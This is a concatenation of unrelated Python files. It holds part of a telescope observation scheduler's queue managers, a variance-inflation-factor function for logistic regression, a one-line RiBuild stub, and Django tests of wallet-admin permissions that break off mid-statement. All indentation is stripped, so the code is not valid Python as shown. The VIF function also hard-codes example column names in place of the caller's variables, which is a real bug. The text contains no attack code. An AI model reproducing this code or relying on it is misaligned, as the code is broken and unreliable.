df_az = self.fields.block_az[bi]
df_az.name = 'azimuth'
df = df.join(df_az, on='field_id')
for fid in FILTER_IDS:
df_limmag, df_sky = \
compute_limiting_mag(df, ti, self.fields.Sky,
filter_id = fid)
lim_mags[(bi, fid)] = df_limmag
sky_brightnesses[(bi, fid)] = df_sky
decs[(bi, fid)] = df.dec
# this results in a MultiIndex on the *columns*: level 0 is block,
# level 1 is filter_id. df_metric.unstack() flattens it
self.block_lim_mags = pd.DataFrame(lim_mags)
self.block_sky_brightness = pd.DataFrame(sky_brightnesses)
block_decs = pd.DataFrame(decs)
self.block_slot_metric = self._slot_metric(self.block_lim_mags,
block_decs)
# count the number of observations requested by filter
df['n_reqs_tot'] = 0
for fid in FILTER_IDS:
df['n_reqs_{}'.format(fid)] = \
df.filter_ids.apply(lambda x: np.sum([xi == fid for xi in x]))
df['n_reqs_tot'] += df['n_reqs_{}'.format(fid)]
# prepare the data for input to gurobi
#import shelve
#s = shelve.open('tmp_vars.shelf')
#s['block_lim_mags'] = self.block_lim_mags
#s['block_slot_metric'] = self.block_slot_metric
#s['df'] = df
#s.close()
self.request_sets_tonight, df_slots, dft = night_optimize(
self.block_slot_metric, df, self.requests_allowed,
time_limit = time_limit, block_use = block_use)
grp = df_slots.groupby('slot')
self.queued_requests_by_slot = grp['request_id'].apply(list)
self.filter_by_slot = \
grp['metric_filter_id'].apply(lambda x: np.unique(x)[0])
# rework to dump output
df_slots['scheduled'] = True
dft.set_index(['request_id','slot','metric_filter_id'],inplace=True)
df_slots.set_index(['request_id','slot','metric_filter_id'],inplace=True)
dft = dft.join(df_slots,how='outer')
dft['scheduled'] = dft['scheduled'].fillna(False)
dft.reset_index(inplace=True)
dft = pd.merge(dft,df[['field_id']],
left_on='request_id', right_index=True)
n_requests_scheduled = np.sum(dft['scheduled'])
total_metric_value = np.sum(dft['scheduled']*dft['metric'])
avg_metric_value = total_metric_value / n_requests_scheduled
tot_avail_requests_bysubprogram = \
df.groupby(['program_id','subprogram_name'])['n_reqs_tot'].agg(np.sum)
tot_avail_requests_bysubprogram.name = 'available'
# use self.requests_allowed and join this all up
nscheduled_requests_bysubprogram = \
dft.loc[dft['scheduled'],['program_id','subprogram_name']].groupby(['program_id','subprogram_name']).agg(len)
nscheduled_requests_bysubprogram.name = 'scheduled'
# reformat requests_allowed for joining
mux = pd.MultiIndex.from_tuples(self.requests_allowed.keys(),
names = ['program_id','subprogram_name'])
df_allowed = pd.DataFrame(list(self.requests_allowed.values()),
index=mux,columns=['allowed'])
df_summary = df_allowed.join(tot_avail_requests_bysubprogram).join(nscheduled_requests_bysubprogram)
self.logger.info(df_summary)
self.logger.info(f'{n_requests_scheduled} requests scheduled')
self.logger.info(f'{total_metric_value:.2f} total metric value; '
f'{avg_metric_value:.2f} average per request')
# this is not ideal for
tnow = current_state['current_time']
yymmdd = tnow.iso.split()[0][2:].replace('-','')
solution_outfile = f'{BASE_DIR}/../sims/gurobi_solution_{yymmdd}.csv'
before_noon_utc = (tnow.mjd - np.floor(tnow.mjd)) < 0.5
# avoid clobbering the solution file with restarts after observing has
# completed
if before_noon_utc or (not os.path.exists(solution_outfile)):
dft.drop(columns=['Yrtf']).to_csv(solution_outfile)
def _sequence_requests_in_block(self, current_state):
"""Solve the TSP for requests in this slot"""
self.queue_slot = block_index(current_state['current_time'])[0]
# raise an error if there are missing blocks--potentially due to
# excluded blocks
if self.queue_slot not in self.queued_requests_by_slot.index:
raise QueueEmptyError(f"Current block {self.queue_slot} is not stored")
# retrieve requests to be observed in this block
req_list = self.queued_requests_by_slot.loc[self.queue_slot]
# request_set ids should be unique per block
assert( (len(set(req_list)) == len(req_list) ) )
if np.all(np.isnan(req_list)):
raise QueueEmptyError("No requests assigned to this block")
idx = pd.Index(req_list)
# reconstruct
df = self.rp.pool.loc[idx].join(self.fields.fields, on='field_id').copy()
az = self.fields.block_az[self.queue_slot]
df = df.join(az, on='field_id')
# now prepend the CALSTOW positoin so we can minimize slew from
# filter exchanges
# Need to use current HA=0
df_blockstart = pd.DataFrame({'ra':HA_to_RA(0,
current_state['current_time']).to(u.degree).value,
'dec':-48.,'azimuth':180.},index=[0])
df_fakestart = pd.concat([df_blockstart,df],sort=True)
# compute overhead time between all request pairs
# compute pairwise slew times by axis for all pointings
slews_by_axis = {}
def coord_to_slewtime(coord, axis=None):
c1, c2 = np.meshgrid(coord, coord)
dangle = np.abs(c1 - c2)
angle = np.where(dangle < (360. - dangle), dangle, 360. - dangle)
return slew_time(axis, angle * u.deg)
slews_by_axis['dome'] = coord_to_slewtime(
df_fakestart['azimuth'], axis='dome')
slews_by_axis['dec'] = coord_to_slewtime(
df_fakestart['dec'], axis='dec')
slews_by_axis['ra'] = coord_to_slewtime(
df_fakestart['ra'], axis='ha')
maxradec = np.maximum(slews_by_axis['ra'], slews_by_axis['dec'])
maxslews = np.maximum(slews_by_axis['dome'], maxradec)
# impose a penalty on zero-length slews (which by construction
# in this mode are from different programs)
wnoslew = maxslews == 0
maxslews[wnoslew] = READOUT_TIME * 10.
overhead_time = np.maximum(maxslews, READOUT_TIME)
tsp_order, tsp_overhead_time = tsp_optimize(overhead_time.value)
# remove the fake starting point. tsp_optimize always starts with
# the first observation in df, which by construction is our fake point,
# so we can simply cut it off.
tsp_order = tsp_order[1:]
assert(0 not in tsp_order)
# tsp_order is 0-indexed from overhead time, so I need to
# reconstruct the request_id
self.queue_order = df_fakestart.index.values[tsp_order]
self.queue = df
def _move_requests_to_missed_obs(self, queue_slot):
"""After a block is expired, move any un-observed requests into the missed_obs queue."""
#self.queue should have any remaining obs
if len(self.queue):
cols = ['program_id', 'subprogram_name', 'program_pi', 'field_id',
'intranight_gap_min', 'exposure_time', 'priority']
# it's a little confusing, because each queue entry has all of the
# filter_ids from the original request set. So we have to
# make a pool that only has single filters in it.
filter_id = int(self.filter_by_slot[queue_slot])
missed_obs = self.queue.loc[:,cols].copy()
missed_obs['filter_ids'] = pd.Series([[filter_id] for i in missed_obs.index],index=missed_obs.index)
missed_obs['total_requests_tonight'] = 1
self.logger.info(f"Saving {len(missed_obs)} requests (filter {filter_id}) to the missed_obs queue: {missed_obs.loc[:,['subprogram_name','field_id']]}")
# the missed obs RequestPool wants request *sets*, so find out
# if previous requests were missed
rows_to_append = []
for idx, row in missed_obs.iterrows():
if idx in self.missed_obs_queue.rp.pool.index:
assert(len(self.missed_obs_queue.rp.pool.loc[idx] == 1))
self.missed_obs_queue.rp.pool.loc[idx,'filter_ids'].append(filter_id)
self.missed_obs_queue.rp.pool.loc[idx,'total_requests_tonight'] += 1
else:
rows_to_append.append(row)
self.missed_obs_queue.rp.pool = self.missed_obs_queue.rp.pool.append(rows_to_append)
else:
self.logger.debug(f'No remaining queued observations in slot {queue_slot}')
def _remove_requests(self, request_set_id):
"""Remove a request from both the queue and the pool.
Note that gurobi queue uses request_set_id to index."""
# should be the topmost item
assert (self.queue_order[0] == request_set_id)
self.queue_order = self.queue_order[1:]
row = self.queue.loc[request_set_id]
self.queue = self.queue.drop(request_set_id)
# (past slot assignments are still in self.queued_requests_by_slot)
# (we will only reuse the RequestPool if we do recomputes)
self.rp.remove_request(request_set_id,
self.filter_by_slot.loc[self.queue_slot])
def _return_queue(self):
# start by setting up the current slot
if len(self.queue) > 0:
queue = self.queue.loc[self.queue_order].copy()
queue.loc[:,'ordered'] = True
queue.loc[:,'slot_start_time'] = block_index_to_time(
self.queue_slot, Time.now(), where='start').iso
else:
# before the night starts, the queue is empty
queue = self.queue.copy()
# now loop over upcoming slots, ensuring they are sorted (should be)
slots = self.queued_requests_by_slot.index.values
slots = np.sort(slots)
for slot in slots:
if (self.queue_slot is not None):
if slot <= self.queue_slot:
continue
slot_requests = self.queued_requests_by_slot.loc[slot]
idx = pd.Index(slot_requests)
# reconstruct
df = self.rp.pool.loc[idx].join(self.fields.fields, on='field_id').copy()
df.loc[:,'filter_id'] = self.filter_by_slot[slot]
df.loc[:,'ordered'] = False
df.loc[:,'slot_start_time'] = block_index_to_time(slot,
Time.now(), where='start').iso
queue = queue.append(df)
return queue
class GreedyQueueManager(QueueManager):
def __init__(self, queue_name, queue_configuration, **kwargs):
super().__init__(queue_name, queue_configuration, **kwargs)
self.time_of_last_filter_change = None
self.min_time_before_filter_change = TIME_BLOCK_SIZE
self.queue_type = 'greedy'
def _assign_nightly_requests(self, current_state,
time_limit = 30.*u.second, block_use = defaultdict(float)):
# initialize the time of last filter change
if self.time_of_last_filter_change is None:
self.time_of_last_filter_change = current_state['current_time']
def _next_obs(self, current_state, obs_log):
"""Select the highest value request."""
# since this is a greedy queue, we update the queue after each obs
# for speed, only do the whole recalculation if we're in a new slot
# if ((block_index(current_state['current_time'])[0] != self.queue_slot)
# or (len(self.queue) == 0)):
# self._update_queue(current_state)
# else:
# # otherwise just recalculate the overhead times
# _ = self._update_overhead(current_state)
# to get the "on the fly" cadence windows to work I have to
# run the whole queue every time right now...
self._update_queue(current_state, obs_log)
# in case this wasn't initialized by assign_nightly_requests
if self.time_of_last_filter_change is None:
self.time_of_last_filter_change = current_state['current_time']
# check if filter changes are allowed yet
if ((current_state['current_time'] - self.time_of_last_filter_change)
< self.min_time_before_filter_change):
# only consider observations in the current filter
queue = self.queue[self.queue['filter_id'] == current_state['current_filter_id']]
# unless there are no more observations, in which case allow a
# change
if len(queue) == 0:
queue = self.queue
else:
# allow filter changes if desired
queue = self.queue
# request_id of the highest value request
max_idx = queue.value.idxmax()
row = queue.loc[max_idx]
next_obs = {'target_field_id': row['field_id'],
'target_ra': row['ra'],
'target_dec': row['dec'],
'target_filter_id': row['filter_id'],
'target_program_id': row['program_id'],
'target_subprogram_name': row['subprogram_name'],
'target_program_pi': row['program_pi'],
'target_exposure_time': row['exposure_time'] * u.second,
'target_sky_brightness': row['sky_brightness'],
'target_limiting_mag': row['limiting_mag'],
'target_metric_value': row['value'],
'target_total_requests_tonight': row['total_requests_tonight'],
'target_mode_num': 0,
'target_num_images': 1,
'request_id': max_idx}
return next_obs
def _metric(self, df):
"""Calculate metric for prioritizing fields.
Penalizes volume for both extinction (airmass) and fwhm penalty
due to atmospheric refraction, plus sky brightness from
moon phase and distance, overhead time
== 1 for 21st mag, 15 sec overhead.
Normalize by value at transit."""
return 10.**(0.6 * (df['limiting_mag'] - 21)) / \
(1-1e-4*(maximum_altitude(df['dec']) - 90)**2.) / \
((EXPOSURE_TIME.value + df['overhead_time']) /
(EXPOSURE_TIME.value + 10.))
def _update_overhead(self, current_state, df=None):
"""recalculate overhead values without regenerating whole queue"""
inplace = df is None
if inplace:
# no dataframe supplied, so replace existing self.queue on exit
df = self.queue
df.drop(['overhead_time', 'altitude', 'azimuth'], axis=1,
inplace=True)
# compute readout/slew overhead times, plus current alt/az
df_overhead, df_altaz = self.fields.overhead_time(current_state)
# nb: df has index request_id, not field_id
df = pd.merge(df, df_overhead, left_on='field_id', right_index=True)
df = pd.merge(df, df_altaz, left_on='field_id', right_index=True)
df.rename(columns={'alt': 'altitude', 'az': 'azimuth'}, inplace=True)
# add overhead for filter changes
w = df['filter_id'] != current_state['current_filter_id']
if np.sum(w):
df.loc[w, 'overhead_time'] += FILTER_CHANGE_TIME.to(u.second).value
if inplace:
df.loc[:, 'value'] = self._metric(df)
self.queue = df
return df
def _update_queue(self, current_state, obs_log):
"""Calculate greedy weighting of requests in the Pool using current
telescope state only"""
# store block index for which these values were calculated
self.queue_slot = block_index(current_state['current_time'])[0]
# check that the pool has fields in it
if len(self.rp.pool) == 0:
raise QueueEmptyError("No fields in pool")
# join with fields so we have the information we need
# make a copy so rp.pool and self.queue are not linked
df_rs = self.rp.pool.join(self.fields.fields, on='field_id').copy()
# now expand the dataframe of request sets to a dataframe with one
# row per obs.
requests = []
for request_set_id, row in df_rs.iterrows():
rdict = row.to_dict()
filter_ids = rdict.pop('filter_ids')
for filter_id in filter_ids:
ri = rdict.copy()
ri['filter_id'] = filter_id
ri['request_set_id'] = request_set_id
requests.append(ri)
df = pd.DataFrame(requests)
df = self._update_overhead(current_state, df=df)
# start with conservative altitude cut;
# airmass weighting applied naturally below
# also make a copy because otherwise it retains knowledge of
# (discarded) previous reference and raises SettingWithCopyWarnings
df = df.loc[df['altitude'] > 20, :].copy()
if len(df) == 0:
raise QueueEmptyError("No fields in queue above altitude cut")
# if restricting to one program per block, drop other programs
if self.block_programs:
current_block_program = PROGRAM_BLOCK_SEQUENCE[
self.queue_slot % LEN_BLOCK_SEQUENCE]
df = df.loc[df['program_id'] == current_block_program, :]
cadence_cuts = enough_gap_since_last_obs(df,
current_state,obs_log)
self.requests_in_window = np.sum(cadence_cuts) > 0
if ~self.requests_in_window:
self.logger.warning(calc_queue_stats(df, current_state,
intro="No fields with observable cadence windows. Queue in progress:"))
raise QueueEmptyError("No fields with observable cadence windows")
# also make a copy because otherwise it retains knowledge of
# (discarded) previous reference and raises SettingWithCopyWarnings
df = df.loc[cadence_cuts, :].copy()
# compute airmasses by field_id
# airmass = zenith_angle_to_airmass(90. - df_alt)
# airmass.name = 'airmass'
# df = pd.merge(df, pd.DataFrame(airmass),
# left_on='field_id', right_index=True)
# airmass cut (or add airmass weighting to value below)
# df = df[(df['airmass'] <= MAX_AIRMASS) & (df['airmass'] > 0)]
df_limmag, df_sky = compute_limiting_mag(df,
current_state['current_time'], self.fields.Sky)
df.loc[:, 'limiting_mag'] = df_limmag
df.loc[:, 'sky_brightness'] = df_sky
#df_limmag.name = 'limiting_mag'
#df = pd.merge(df, df_limmag, left_on='field_id', right_index=True)
df.loc[:, 'value'] = self._metric(df)
self.queue = df
def _remove_requests(self, request_id):
"""Remove a request from both the queue and the request pool"""
row = self.queue.loc[request_id]
self.queue = self.queue.drop(request_id)
self.rp.remove_request(row['request_set_id'], row['filter_id'])
def _return_queue(self):
if 'value' in self.queue.columns:
queue = self.queue.sort_values('value',ascending=False).copy()
else:
queue = self.queue.copy()
# we have put these in value order but the sequence can change
queue['ordered'] = False
return queue
class ListQueueManager(QueueManager):
"""Simple Queue that returns observations in order."""
def __init__(self, queue_name, queue_configuration, fields=None, **kwargs):
self.queue_type = 'list'
# queue name (useful in Scheduler object when swapping queues)
self.queue_name = queue_name
if fields is None:
self.fields = Fields()
else:
self.fields = fields
# the queue itself
self.load_list_queue(queue_configuration.config['targets'])
if 'validity_window_mjd' in queue_configuration.config:
window = queue_configuration.config['validity_window_mjd']
if window is not None:
assert(len(window) == 2)
assert(window[1] > window[0])
self.validity_window = [Time(window[0],format='mjd'),
Time(window[1],format='mjd')]
else:
self.validity_window = None
else:
self.validity_window = None
self.is_TOO = queue_configuration.config['targets'][0]['subprogram_name'].startswith('ToO')
def _assign_nightly_requests(self, current_state,
**kwargs):
pass
def _update_queue(self, current_state, obs_log):
pass
def load_list_queue(self, queue_dict_list, append=False):
"""Initialize an ordered queue.
queue_dict_list is a list of dicts, one per observation"""
df = pd.DataFrame(queue_dict_list)
# check that major columns are included
required_columns = ['field_id','program_id', 'subprogram_name',
'filter_id', 'program_pi']
for col in required_columns:
if col not in df.columns:
raise ValueError(f'Missing required column {col}')
# by default use field ids alone to specify pointings,
# but allow manual ra/dec if needed
if ('ra' not in df.columns) and ('dec' not in df.columns):
queue = df.join(self.fields.fields, on='field_id', how='inner').sort_index().copy()
else:
queue = df
# if some of the field ids are bad, there will be missing rows
if len(queue) != len(df):
raise ValueError('One or more field ids are malformed: {}'.format(
df.index.difference(self.fields.fields.index)))
# add standard keywords if not present
if 'exposure_time' not in queue.columns:
queue['exposure_time'] = EXPOSURE_TIME.to(u.second).value
if 'max_airmass' not in queue.columns:
queue['max_airmass'] = MAX_AIRMASS
if 'n_repeats' not in queue.columns:
queue['n_repeats'] = 1
if 'mode_num' not in queue.columns:
queue['mode_num'] = 0
if 'ewr_num_images' not in queue.columns:
queue['num_images'] = 1
else:
queue['num_images'] = queue['ewr_num_images']
if append:
self.queue = self.queue.append(queue, ignore_index=True)
else:
self.queue = queue
def _next_obs(self, current_state, obs_log):
"""Return the next observation in the time ordered queue unless it has expired."""
if len(self.queue) == 0:
raise QueueEmptyError("No more observations in queue!")
# take the next observation in line
idx = 0
while True:
if idx == len(self.queue):
raise QueueEmptyError("No valid observations in queue!")
ra = self.queue.iloc[idx].ra
ha = RA_to_HA(ra * u.degree, current_state['current_time']
).to(u.degree).wrap_at(180.*u.degree).value
dec = self.queue.iloc[idx].dec
sc = coord.SkyCoord(ra,dec, unit=u.deg)
airmass = altitude_to_airmass(
skycoord_to_altaz(sc,
current_state['current_time']).alt.to(u.deg).value)
if airmass >= self.queue.iloc[idx].max_airmass:
idx += 1
continue
# Reed limits |HA| to < 5.95 hours (most relevant for circumpolar
# fields not hit by the airmass cut)
if np.abs(ha) >= (5.95 * u.hourangle).to(u.degree).value:
idx += 1
continue
# 1) HA < -17.6 deg && Dec < -22 deg is rejected for both track & stow because of interference with FFI.
if (ha <= -17.6) & (dec <= -22):
idx += 1
continue
# West of HA -17.6 deg, Dec < -45 deg is rejected for tracking because of the service platform in the south.
if (ha >= -17.6) & (dec <= -45):
idx += 1
continue
# fabs(HA) > 3 deg is rejected for Dec < -46 to protect the shutter "ears".
if (np.abs(ha) >= 3.) & (dec <= -46):
idx += 1
continue
# dec > 87.5 is rejected
if (dec > 87.5):
idx += 1
continue
break
next_obs = {'target_field_id': int(self.queue.iloc[idx].field_id),
'target_ra': self.queue.iloc[idx].ra,
'target_dec': self.queue.iloc[idx].dec,
'target_filter_id': self.queue.iloc[idx].filter_id,
'target_program_id': int(self.queue.iloc[idx].program_id),
'target_subprogram_name': self.queue.iloc[idx].subprogram_name,
'target_program_pi': self.queue.iloc[idx].program_pi,
'target_exposure_time': self.queue.iloc[idx].exposure_time * u.second,
'target_sky_brightness': 0.,
'target_limiting_mag': 0.,
'target_metric_value': 0.,
'target_total_requests_tonight': 1,
'target_mode_num': int(self.queue.iloc[idx].mode_num),
'target_num_images': int(self.queue.iloc[idx].num_images),
'request_id': self.queue.index[idx]}
return next_obs
def _remove_requests(self, request_id):
"""Remove a request from the queue"""
try:
if self.queue.loc[request_id,'n_repeats'] > 1:
self.queue.loc[request_id,'n_repeats'] -= 1
else:
self.queue = self.queue.drop(request_id)
except Exception:
self.logger.exception(f'Failure removing request {request_id}')
def _return_queue(self):
# by construction the list queue is already in order
queue = self.queue.copy()
queue['ordered'] = True
return queue
class RequestPool(object):
def __init__(self):
# initialize empty dataframe to add to
self.pool = pd.DataFrame()
pass
def add_request_sets(self, program_id, subprogram_name, program_pi,
field_ids, filter_ids, intranight_gap, exposure_time,
total_requests_tonight, priority=1):
"""program_ids must be scalar"""
assert (scalar_len(program_id) == 1)
assert (scalar_len(subprogram_name) == 1)
n_fields = scalar_len(field_ids)
if n_fields == 1:
# see if it's iterable or not
try:
iterator = iter(field_ids)
except TypeError:
# if not, assume it's a scalar and wrap in a list
field_ids = [field_ids]
# build df as a list of dicts
request_sets = []
for i, field_id in enumerate(field_ids):
request_sets.append({
'program_id': program_id,
'subprogram_name': subprogram_name,
'program_pi': program_pi,
'field_id': field_id,
'filter_ids': filter_ids.copy(),
# pandas doesn't play well with astropy quantities, so change
# back to seconds
'intranight_gap_min': intranight_gap.to(u.minute).value,
'exposure_time': exposure_time.to(u.second).value,
'total_requests_tonight': total_requests_tonight,
'priority': priority})
self.pool = self.pool.append(pd.DataFrame(request_sets),
ignore_index=True)
def n_request_sets(self):
return len(self.pool)
def remove_request_sets(self, request_set_ids):
"""Remove completed or otherwise unwanted requests by request_id
request_ids : scalar or list
requests to drop (index of self.pool)"""
self.pool = self.pool.drop(request_set_ids)
def remove_request(self, request_set_id, filter_id):
"""Remove single completed request from a request set.
request_set_id: scalar
request set to modify (index of self.pool)
filter_id: scalar
filter_id of completed observation"""
rs = self.pool.loc[request_set_id].copy()
filters = rs['filter_ids']
# this is another step that shouldn't be necessary...
filters.remove(filter_id)
if len(filters) == 0:
self.remove_request_sets(request_set_id)
else:
self.pool.at[request_set_id, 'filter_ids'] = filters
def clear_all_request_sets(self):
self.pool = pd.DataFrame()
# utils for examining inputs
def calc_pool_stats(df, intro=""):
"""
df = Q.rp.pool"""
stats_str = intro + "\n"
stats_str += "\t{} request sets\n".format(len(df))
stats_str += "\t{} unique fields\n".format(len(set(df.field_id)))
for prog_id in PROGRAM_IDS:
w = df.program_id == prog_id
stats_str += "\tProgram {}:\n".format(prog_id)
stats_str += "\t\t{} request sets\n".format(np.sum(w))
stats_str += "\t\t{} unique fields\n".format(
len(set(df.loc[w, 'field_id'])))
stats_str += "\t\t{} median requests tonight per field\n".format(
np.median(df.loc[w, 'total_requests_tonight']))
return stats_str
def calc_queue_stats(df, current_state, intro=""):
"""
df = Q.queue"""
stats_str = intro + "\n"
stats_str += "\t{} queued requests\n".format(len(df))
stats_str += "\t{} unique fields\n".format(len(set(df.field_id)))
for prog_id in PROGRAM_IDS:
w = df.program_id == prog_id
stats_str += "\tProgram {}:\n".format(prog_id)
if np.sum(w) == 0:
stats_str += "\t\tNo queued requests!\n"
continue
stats_str += "\t\t{} requests\n".format(np.sum(w))
stats_str += "\t\t{} unique fields\n".format(
len(set(df.loc[w, 'field_id'])))
walt = w & (df.loc[w, 'altitude'] > 20)
stats_str += "\t\t{} fields above altitude cut\n".format(
np.sum(walt))
# wfirst = walt & (df.loc[walt, 'request_number_tonight'] == 1)
# stats_str += "\t\t{} requests awaiting first obs tonight\n".format(
# np.sum(wfirst))
return stats_str
|
import pandas as pd
import statsmodels.api as sm
from patsy import dmatrices
from statsmodels.stats.outliers_influence import variance_inflation_factor
from .condition_fun import *
def vif(dt, y, x=None, merge_coef = False, positive="bad|1"):
'''
Variance Inflation Factors
------
vif calculates variance-inflation factors for logistic regression.
Params
------
dt: A data frame with both x (predictor/feature) and y (response/label) variables.
y: Name of y variable.
x: Name of x variables. Default is None. If x is None,
then all variables except y are counted as x variables.
merge_coef: Logical, whether to merge with coefficients of model summary matrix. Defaults to FALSE.
positive: Value of positive class, default "bad|1".
Returns
------
data frame
A data frame with columns for variable and gvif.
Examples
------
import scorecardpy as sc
# load data
dat = sc.germancredit()
# Example I
sc.vif(dat,
y = 'creditability',
x=['age_in_years', 'credit_amount', 'present_residence_since'],
merge_coef=True)
'''
dt = dt.copy(deep=True)
if isinstance(y, str):
y = [y]
if isinstance(x, str) and x is not None:
x = [x]
if x is not None:
dt = dt[y+x]
# check y
dt = check_y(dt, y, positive)
# x variables
x = x_variable(dt, y, x)
# dty, dtx
ytrain = dt.loc[:,y]
Xtrain = dt.loc[:,x]
Xtrain = sm.add_constant(Xtrain)
# logistic regression
lrfit = sm.GLM(
ytrain.astype(float),
Xtrain.astype(float),
family=sm.families.Binomial()
).fit()
# vif
dty, dtX = dmatrices(' ~ '.join([y[0], '+'.join(x)]), data=dt, return_type="dataframe")
dfvif = pd.DataFrame({
'variables': ['const', 'age_in_years', 'credit_amount', 'present_residence_since'],
'vif': [variance_inflation_factor(dtX.values, i) for i in range(dtX.shape[1])]
})
# merge with coef
if merge_coef:
dfvif = pd.merge(
lrfit.summary2().tables[1].reset_index().rename(columns = {'index':'variables'}),
dfvif,
on = 'variables', how='outer'
)
return dfvif
|
__author__ = "Christian Kongsgaard"
__license__ = 'MIT'
# -------------------------------------------------------------------------------------------------------------------- #
# IMPORTS
# Modules
# RiBuild Modules
import datetime
# -------------------------------------------------------------------------------------------------------------------- #
# RIBuild
datetime.datetime(2019, 5, 24, 14, 46, 36, 813029)
|
import pytezos
from django.contrib.auth.models import Permission
from django.test import TestCase
from django.urls.base import reverse
from apps.wallet.models import (
CashOutRequest,
MetaTransaction,
PaperWallet,
Transaction,
Wallet,
WalletPublicKeyTransferRequest,
)
from project.utils_testing import EcouponTestCaseMixin
class WalletAdminTestCase(EcouponTestCaseMixin, TestCase):
def test_only_staff_see_wallet_admin(self):
self.client.force_login(self.user)
url = reverse("admin:wallet_wallet_changelist")
resp = self.client.get(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(resp.url.startswith("/admin/login"))
self.user.user_permissions.add(Permission.objects.get(codename="view_wallet"))
self.user.user_permissions.add(
Permission.objects.get(codename="can_view_all_currencies")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(resp.url.startswith("/admin/login"))
self.client.force_login(self.staff_user)
self.staff_user.user_permissions.add(
Permission.objects.get(codename="view_wallet")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
def test_see_correct_wallets(self):
url = reverse("admin:wallet_wallet_changelist")
self.staff_user.user_permissions.add(
Permission.objects.get(codename="view_wallet")
)
self.client.force_login(self.staff_user)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
list(resp.context_data["cl"].queryset),
[],
)
self.currency.users.add(self.staff_user)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
sorted(list(resp.context_data["cl"].queryset), key=lambda x: x.wallet_id),
sorted(
list(Wallet.objects.filter(currency=self.currency)),
key=lambda x: x.wallet_id,
),
)
self.staff_user.user_permissions.add(
Permission.objects.get(codename="can_view_all_currencies")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
sorted(list(resp.context_data["cl"].queryset), key=lambda x: x.wallet_id),
sorted(list(Wallet.objects.all()), key=lambda x: x.wallet_id),
)
class PaperWalletAdminTestCase(EcouponTestCaseMixin, TestCase):
# TODO: FIXME: add test for admin actions
def test_only_staff_see_wallet_admin(self):
self.client.force_login(self.user)
url = reverse("admin:wallet_paperwallet_changelist")
resp = self.client.get(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(resp.url.startswith("/admin/login"))
self.user.user_permissions.add(
Permission.objects.get(codename="view_paperwallet")
)
self.user.user_permissions.add(
Permission.objects.get(codename="can_view_all_currencies")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(resp.url.startswith("/admin/login"))
self.client.force_login(self.staff_user)
self.staff_user.user_permissions.add(
Permission.objects.get(codename="view_paperwallet")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
def test_see_correct_wallets(self):
url = reverse("admin:wallet_paperwallet_changelist")
self.staff_user.user_permissions.add(
Permission.objects.get(codename="view_paperwallet")
)
self.client.force_login(self.staff_user)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
list(resp.context_data["cl"].queryset),
[],
)
self.currency.users.add(self.staff_user)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
sorted(list(resp.context_data["cl"].queryset), key=lambda x: x.wallet_id),
sorted(
list(PaperWallet.objects.filter(currency=self.currency)),
key=lambda x: x.wallet_id,
),
)
self.staff_user.user_permissions.add(
Permission.objects.get(codename="can_view_all_currencies")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
sorted(list(resp.context_data["cl"].queryset), key=lambda x: x.wallet_id),
sorted(list(PaperWallet.objects.all()), key=lambda x: x.wallet_id),
)
class TransactionAdminTestCase(EcouponTestCaseMixin, TestCase):
# TODO: FIXME: add test for admin actions
def test_only_staff_see_transaction_admin(self):
self.client.force_login(self.user)
url = reverse("admin:wallet_transaction_changelist")
resp = self.client.get(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(resp.url.startswith("/admin/login"))
self.user.user_permissions.add(
Permission.objects.get(codename="view_transaction")
)
self.user.user_permissions.add(
Permission.objects.get(codename="can_view_all_currencies")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(resp.url.startswith("/admin/login"))
self.client.force_login(self.staff_user)
self.staff_user.user_permissions.add(
Permission.objects.get(codename="view_transaction")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
def test_see_correct_transactions(self):
url = reverse("admin:wallet_transaction_changelist")
def sorting_fun(x):
if x.to_wallet:
return x.to_wallet.wallet_id
else:
return x.amount
self.staff_user.user_permissions.add(
Permission.objects.get(codename="view_transaction")
)
self.client.force_login(self.staff_user)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
list(resp.context_data["cl"].queryset),
[],
)
self.currency.users.add(self.staff_user)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
sorted(
list(resp.context_data["cl"].queryset),
key=sorting_fun,
),
sorted(
list(Transaction.objects.filter(to_wallet__currency=self.currency)),
key=sorting_fun,
),
)
self.staff_user.user_permissions.add(
Permission.objects.get(codename="can_view_all_currencies")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
sorted(
list(resp.context_data["cl"].queryset),
key=sorting_fun,
),
sorted(list(Transaction.objects.all()), key=sorting_fun),
)
class MetaTransactionAdminTestCase(EcouponTestCaseMixin, TestCase):
def test_only_staff_see_transaction_admin(self):
self.client.force_login(self.user)
url = reverse("admin:wallet_metatransaction_changelist")
resp = self.client.get(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(resp.url.startswith("/admin/login"))
self.user.user_permissions.add(
Permission.objects.get(codename="view_metatransaction")
)
self.user.user_permissions.add(
Permission.objects.get(codename="can_view_all_currencies")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(resp.url.startswith("/admin/login"))
self.client.force_login(self.staff_user)
self.staff_user.user_permissions.add(
Permission.objects.get(codename="view_metatransaction")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
def test_see_correct_transactions(self):
url = reverse("admin:wallet_metatransaction_changelist")
def sorting_fun(x):
if x.to_wallet:
return x.to_wallet.wallet_id
else:
return x.amount
self.staff_user.user_permissions.add(
Permission.objects.get(codename="view_metatransaction")
)
self.client.force_login(self.staff_user)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
